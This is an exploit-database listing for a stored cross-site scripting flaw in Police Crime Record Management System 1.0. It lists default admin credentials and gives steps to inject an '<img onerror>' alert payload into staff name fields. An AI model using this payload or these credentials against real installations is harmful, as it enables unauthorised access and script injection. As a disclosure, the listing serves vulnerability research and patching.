[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Police Crime Record Management System 1.0 - Multiple Stored Cross-Site Scripting Vulnerability

Author
Ömer Hasan Durmuş
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-36638
Category
web applications
Date add
13-08-2021
Platform
php
# Exploit Title: Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Exploit Author: Ömer Hasan Durmuş
# Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Version: v1.0
# Category: Webapps
# Tested on: Linux/Windows

Step 1 : Login to admin account in http://TARGET/ghpolice/login.php default credentials. (1111:admin123)
Step 2 : Then click on the "Add Staff"
Step 3 : Input "<img src=x onerror=alert(1)>" in the field "Firstname" or "Othernames"
Step 4 : Click on "Save and Continue"
Step 5 : Update page.

#  0day.today [2024-12-25]  #